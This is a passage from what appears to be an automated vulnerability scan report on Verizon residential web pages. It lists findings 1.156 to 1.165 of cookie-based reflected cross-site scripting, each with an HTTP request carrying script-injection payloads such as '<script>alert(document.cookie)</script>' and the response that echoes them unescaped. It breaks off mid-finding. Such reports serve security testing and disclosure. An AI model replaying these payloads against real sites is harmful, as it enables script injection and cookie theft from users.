Set-Cookie: ContextInfo_Partner=; expires=Sun, 12-Dec-2010 00:57:54 GMT; path=/
Set-Cookie: ContextInfo_State=TX; path=/
Set-Cookie: ContextInfo_ZipCode=-; path=/
Set-Cookie: ContextInfo_LoginStatus=LoggedOut; path=/
Set-Cookie: BTagRequired=N; domain=.verizon.com; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:57:54 GMT; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:57:54 GMT; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:57:54 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head id="head">

<!--<link href="/content/commonfiles/includes/css/masterh
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TX534FB<SCRIPT>ALERT(1)</SCRIPT>F563FBD5E46 </DIV>
...[SNIP]...

1.156. http://www22.verizon.com/residential/bundles/landing/fios_online_nat.html [vzpers cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/residential/bundles/landing/fios_online_nat.html

Issue detail

The value of the vzpers cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 32a9b'><script>alert(1)</script>572c9a7f055 was submitted in the vzpers cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /residential/bundles/landing/fios_online_nat.html HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; vzapps=STATE=TX; NSC_xxx22_tqmbu_mcw=ffffffff895bc66945525d5f4f58455e445a4a423660; RVServiceLocation=TX; BTagRequired=N; showpromo=N; vzpers=STATE=TX32a9b'><script>alert(1)</script>572c9a7f055; vsrecentsearches=%26%2339%3b~~~~; refURL=http://www22.verizon.com/NROneRetail/NR/exeres/0ECAE15E-8F92-465E-B27B-6897F0CAB2C4,frameless.htm#; VzApps=STATE=TX; canigetfios=Y; ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; Source=CHSI; myservices=vzdock=N; BusinessUnit=residential; autosuggest=on; V347=0; CP=null*; ASP.NET_SessionId=y44x4rr1epl4it451swfoua3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 68227
Expires: Mon, 13 Dec 2010 00:57:47 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 13 Dec 2010 00:57:47 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Sun, 12-Dec-2010 00:57:47 GMT; path=/
Set-Cookie: ContextInfo_LoginStatus=; expires=Sun, 12-Dec-2010 00:57:47 GMT; path=/
Set-Cookie: ContextInfo_ZipCode=; expires=Sun, 12-Dec-2010 00:57:47 GMT; path=/
Set-Cookie: ContextInfo_Partner=; expires=Sun, 12-Dec-2010 00:57:47 GMT; path=/
Set-Cookie: ContextInfo_State=TX; path=/
Set-Cookie: ContextInfo_ZipCode=-; path=/
Set-Cookie: ContextInfo_LoginStatus=LoggedOut; path=/
Set-Cookie: BTagRequired=N; domain=.verizon.com; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:57:47 GMT; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:57:47 GMT; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:57:47 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head id="head">

<!--<link href="/content/commonfiles/includes/css/masterh
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX32A9B'><SCRIPT>ALERT(1)</SCRIPT>572C9A7F055 ' />
...[SNIP]...

1.157. http://www22.verizon.com/residential/bundles/landing/fios_online_nat.html [vzpers cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/residential/bundles/landing/fios_online_nat.html

Issue detail

The value of the vzpers cookie is copied into the HTML document as plain text between tags. The payload e3de0<script>alert(1)</script>d4642ed9060 was submitted in the vzpers cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /residential/bundles/landing/fios_online_nat.html HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; vzapps=STATE=TX; NSC_xxx22_tqmbu_mcw=ffffffff895bc66945525d5f4f58455e445a4a423660; RVServiceLocation=TX; BTagRequired=N; showpromo=N; vzpers=STATE=TXe3de0<script>alert(1)</script>d4642ed9060; vsrecentsearches=%26%2339%3b~~~~; refURL=http://www22.verizon.com/NROneRetail/NR/exeres/0ECAE15E-8F92-465E-B27B-6897F0CAB2C4,frameless.htm#; VzApps=STATE=TX; canigetfios=Y; ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; Source=CHSI; myservices=vzdock=N; BusinessUnit=residential; autosuggest=on; V347=0; CP=null*; ASP.NET_SessionId=y44x4rr1epl4it451swfoua3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 68223
Expires: Mon, 13 Dec 2010 00:57:55 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 13 Dec 2010 00:57:55 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Sun, 12-Dec-2010 00:57:54 GMT; path=/
Set-Cookie: ContextInfo_LoginStatus=; expires=Sun, 12-Dec-2010 00:57:54 GMT; path=/
Set-Cookie: ContextInfo_ZipCode=; expires=Sun, 12-Dec-2010 00:57:54 GMT; path=/
Set-Cookie: ContextInfo_Partner=; expires=Sun, 12-Dec-2010 00:57:54 GMT; path=/
Set-Cookie: ContextInfo_State=TX; path=/
Set-Cookie: ContextInfo_ZipCode=-; path=/
Set-Cookie: ContextInfo_LoginStatus=LoggedOut; path=/
Set-Cookie: BTagRequired=N; domain=.verizon.com; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:57:54 GMT; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:57:54 GMT; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:57:54 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head id="head">

<!--<link href="/content/commonfiles/includes/css/masterh
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TXE3DE0<SCRIPT>ALERT(1)</SCRIPT>D4642ED9060 </DIV>
...[SNIP]...

1.158. http://www22.verizon.com/residential/bundles/overview [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/residential/bundles/overview

Issue detail

The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload cf0ca<script>alert(1)</script>6e69d41111a was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /residential/bundles/overview HTTP/1.1
Host: www22.verizon.com
Proxy-Connection: keep-alive
Referer: http://www22.verizon.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ak-sf=false; V347=0; myservices=vzdock=N; AimsChatURL_Cookie=https://collaborateext.verizon.com; vzapps=STATE=TXcf0ca<script>alert(1)</script>6e69d41111a; ASP.NET_SessionId=y44x4rr1epl4it451swfoua3; vzpers=STATE=TX; CP=null*; canigetfios=Y; showpromo=N; refURL=http://www22.verizon.com/; vsrecentsearches=%26%2339%3b~~~~; NSC_xxx22_tqmbu_mcw=ffffffff895bc66945525d5f4f58455e445a4a423660; BusinessUnit=residential

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 119634
Expires: Mon, 13 Dec 2010 00:40:12 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 13 Dec 2010 00:40:12 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Sun, 12-Dec-2010 00:40:12 GMT; path=/
Set-Cookie: ContextInfo_State=TXcf0ca<script>alert(1)</script>6e69d41111a; path=/
Set-Cookie: BTagRequired=N; domain=.verizon.com; path=/
Set-Cookie: ContextInfo_State=; expires=Sun, 12-Dec-2010 00:40:12 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Sun, 12-Dec-2010 00:40:12 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Sun, 12-Dec-2010 00:40:12 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<span runat="server" id="spnvzapp">TXCF0CA<SCRIPT>ALERT(1)</SCRIPT>6E69D41111A . </span>
...[SNIP]...

1.159. http://www22.verizon.com/residential/bundles/overview [vzpers cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/residential/bundles/overview

Issue detail

The value of the vzpers cookie is copied into the HTML document as plain text between tags. The payload c7c07<script>alert(1)</script>adc9e875827 was submitted in the vzpers cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /residential/bundles/overview HTTP/1.1
Host: www22.verizon.com
Proxy-Connection: keep-alive
Referer: http://www22.verizon.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ak-sf=false; V347=0; myservices=vzdock=N; AimsChatURL_Cookie=https://collaborateext.verizon.com; vzapps=STATE=TX; ASP.NET_SessionId=y44x4rr1epl4it451swfoua3; vzpers=STATE=TXc7c07<script>alert(1)</script>adc9e875827; CP=null*; canigetfios=Y; showpromo=N; refURL=http://www22.verizon.com/; vsrecentsearches=%26%2339%3b~~~~; NSC_xxx22_tqmbu_mcw=ffffffff895bc66945525d5f4f58455e445a4a423660; BusinessUnit=residential

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 115030
Expires: Mon, 13 Dec 2010 00:40:13 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 13 Dec 2010 00:40:13 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Sun, 12-Dec-2010 00:40:13 GMT; path=/
Set-Cookie: ContextInfo_State=TX; path=/
Set-Cookie: BTagRequired=N; domain=.verizon.com; path=/
Set-Cookie: ContextInfo_State=; expires=Sun, 12-Dec-2010 00:40:13 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Sun, 12-Dec-2010 00:40:13 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Sun, 12-Dec-2010 00:40:13 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TXC7C07<SCRIPT>ALERT(1)</SCRIPT>ADC9E875827 </DIV>
...[SNIP]...

1.160. http://www22.verizon.com/residential/bundles/overview [vzpers cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/residential/bundles/overview

Issue detail

The value of the vzpers cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 725b0'><script>alert(1)</script>64710c160a0 was submitted in the vzpers cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /residential/bundles/overview HTTP/1.1
Host: www22.verizon.com
Proxy-Connection: keep-alive
Referer: http://www22.verizon.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ak-sf=false; V347=0; myservices=vzdock=N; AimsChatURL_Cookie=https://collaborateext.verizon.com; vzapps=STATE=TX; ASP.NET_SessionId=y44x4rr1epl4it451swfoua3; vzpers=STATE=TX725b0'><script>alert(1)</script>64710c160a0; CP=null*; canigetfios=Y; showpromo=N; refURL=http://www22.verizon.com/; vsrecentsearches=%26%2339%3b~~~~; NSC_xxx22_tqmbu_mcw=ffffffff895bc66945525d5f4f58455e445a4a423660; BusinessUnit=residential

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 115034
Expires: Mon, 13 Dec 2010 00:40:12 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 13 Dec 2010 00:40:12 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Sun, 12-Dec-2010 00:40:12 GMT; path=/
Set-Cookie: ContextInfo_State=TX; path=/
Set-Cookie: BTagRequired=N; domain=.verizon.com; path=/
Set-Cookie: ContextInfo_State=; expires=Sun, 12-Dec-2010 00:40:12 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Sun, 12-Dec-2010 00:40:12 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Sun, 12-Dec-2010 00:40:12 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX725B0'><SCRIPT>ALERT(1)</SCRIPT>64710C160A0 ' />
...[SNIP]...

1.161. http://www22.verizon.com/residential/bundles/standardBundles [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/residential/bundles/standardBundles

Issue detail

The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload 12395<script>alert(1)</script>0d7230ed11c was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /residential/bundles/standardBundles HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; vzapps=STATE=TX12395<script>alert(1)</script>0d7230ed11c; NSC_xxx22_tqmbu_mcw=ffffffff895bc66945525d5f4f58455e445a4a423660; RVServiceLocation=TX; BTagRequired=N; showpromo=N; vzpers=STATE=TX; vsrecentsearches=%26%2339%3b~~~~; refURL=http://www22.verizon.com/NROneRetail/NR/exeres/0ECAE15E-8F92-465E-B27B-6897F0CAB2C4,frameless.htm#; VzApps=STATE=TX; canigetfios=Y; ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; Source=CHSI; myservices=vzdock=N; BusinessUnit=residential; autosuggest=on; V347=0; CP=null*; ASP.NET_SessionId=y44x4rr1epl4it451swfoua3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 120185
Expires: Mon, 13 Dec 2010 00:57:51 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 13 Dec 2010 00:57:51 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Sun, 12-Dec-2010 00:57:51 GMT; path=/
Set-Cookie: ContextInfo_State=TX12395<script>alert(1)</script>0d7230ed11c; path=/
Set-Cookie: BTagRequired=N; domain=.verizon.com; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:57:51 GMT; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:57:51 GMT; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:57:51 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<span runat="server" id="spnvzapp">TX12395<SCRIPT>ALERT(1)</SCRIPT>0D7230ED11C . </span>
...[SNIP]...

1.162. http://www22.verizon.com/residential/bundles/standardBundles [vzpers cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/residential/bundles/standardBundles

Issue detail

The value of the vzpers cookie is copied into the HTML document as plain text between tags. The payload d2fa4<script>alert(1)</script>b1d9cc2663b was submitted in the vzpers cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /residential/bundles/standardBundles HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; vzapps=STATE=TX; NSC_xxx22_tqmbu_mcw=ffffffff895bc66945525d5f4f58455e445a4a423660; RVServiceLocation=TX; BTagRequired=N; showpromo=N; vzpers=STATE=TXd2fa4<script>alert(1)</script>b1d9cc2663b; vsrecentsearches=%26%2339%3b~~~~; refURL=http://www22.verizon.com/NROneRetail/NR/exeres/0ECAE15E-8F92-465E-B27B-6897F0CAB2C4,frameless.htm#; VzApps=STATE=TX; canigetfios=Y; ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; Source=CHSI; myservices=vzdock=N; BusinessUnit=residential; autosuggest=on; V347=0; CP=null*; ASP.NET_SessionId=y44x4rr1epl4it451swfoua3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 114176
Expires: Mon, 13 Dec 2010 00:57:54 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 13 Dec 2010 00:57:54 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Sun, 12-Dec-2010 00:57:54 GMT; path=/
Set-Cookie: ContextInfo_State=TX; path=/
Set-Cookie: BTagRequired=N; domain=.verizon.com; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:57:54 GMT; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:57:54 GMT; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:57:54 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TXD2FA4<SCRIPT>ALERT(1)</SCRIPT>B1D9CC2663B </DIV>
...[SNIP]...

1.163. http://www22.verizon.com/residential/bundles/standardBundles [vzpers cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/residential/bundles/standardBundles

Issue detail

The value of the vzpers cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 5c6f8'><script>alert(1)</script>d33f67e8494 was submitted in the vzpers cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /residential/bundles/standardBundles HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; vzapps=STATE=TX; NSC_xxx22_tqmbu_mcw=ffffffff895bc66945525d5f4f58455e445a4a423660; RVServiceLocation=TX; BTagRequired=N; showpromo=N; vzpers=STATE=TX5c6f8'><script>alert(1)</script>d33f67e8494; vsrecentsearches=%26%2339%3b~~~~; refURL=http://www22.verizon.com/NROneRetail/NR/exeres/0ECAE15E-8F92-465E-B27B-6897F0CAB2C4,frameless.htm#; VzApps=STATE=TX; canigetfios=Y; ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; Source=CHSI; myservices=vzdock=N; BusinessUnit=residential; autosuggest=on; V347=0; CP=null*; ASP.NET_SessionId=y44x4rr1epl4it451swfoua3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 114180
Expires: Mon, 13 Dec 2010 00:57:52 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 13 Dec 2010 00:57:52 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Sun, 12-Dec-2010 00:57:52 GMT; path=/
Set-Cookie: ContextInfo_State=TX; path=/
Set-Cookie: BTagRequired=N; domain=.verizon.com; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:57:52 GMT; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:57:52 GMT; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:57:52 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX5C6F8'><SCRIPT>ALERT(1)</SCRIPT>D33F67E8494 ' />
...[SNIP]...

1.164. http://www22.verizon.com/residential/directv.htm [vzpers cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/residential/directv.htm

Issue detail

The value of the vzpers cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload f454d'><script>alert(1)</script>b47c22ba5cc was submitted in the vzpers cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /residential/directv.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; vzapps=STATE=TX; NSC_xxx22_tqmbu_mcw=ffffffff895bc66945525d5f4f58455e445a4a423660; RVServiceLocation=TX; BTagRequired=N; showpromo=N; vzpers=STATE=TXf454d'><script>alert(1)</script>b47c22ba5cc; vsrecentsearches=%26%2339%3b~~~~; refURL=http://www22.verizon.com/NROneRetail/NR/exeres/0ECAE15E-8F92-465E-B27B-6897F0CAB2C4,frameless.htm#; VzApps=STATE=TX; canigetfios=Y; ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; Source=CHSI; myservices=vzdock=N; BusinessUnit=residential; autosuggest=on; V347=0; CP=null*; ASP.NET_SessionId=y44x4rr1epl4it451swfoua3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 64034
Expires: Mon, 13 Dec 2010 00:59:03 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 13 Dec 2010 00:59:03 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX; expires=Sun, 12-Dec-2010 00:59:03 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Sun, 12-Dec-2010 00:59:03 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Sun, 12-Dec-2010 00:59:03 GMT; path=/

<html xmlns:vz>
<head id="_ctl0_head"><title>
Verizon | DirecTV | Overview
</title><meta name="keywords" content="direct tv, directv, hd tv, hd, hd channels, tv, dvr, direct tv, satellite, satel
...[SNIP]...
<input type='hidden' id='locationInfo' value='TXF454D'><SCRIPT>ALERT(1)</SCRIPT>B47C22BA5CC ' />
...[SNIP]...

1.165. http://www22.verizon.com/residential/fiosinternet [vzpers cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/residential/fiosinternet

Issue detail

The value of the vzpers cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload b1264'><script>alert(1)</script>165f1efa5f2 was submitted in the vzpers cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

